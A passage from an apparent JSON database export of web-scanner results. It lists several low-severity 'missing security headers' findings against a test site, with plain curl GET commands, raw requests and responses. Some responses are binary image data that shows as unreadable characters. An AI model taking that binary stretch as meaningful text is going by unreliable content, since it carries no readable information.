#&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 743, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:41:53.320Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 744, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:41:53.477Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 745, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:41:53.680Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 746, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:41:53.861Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ 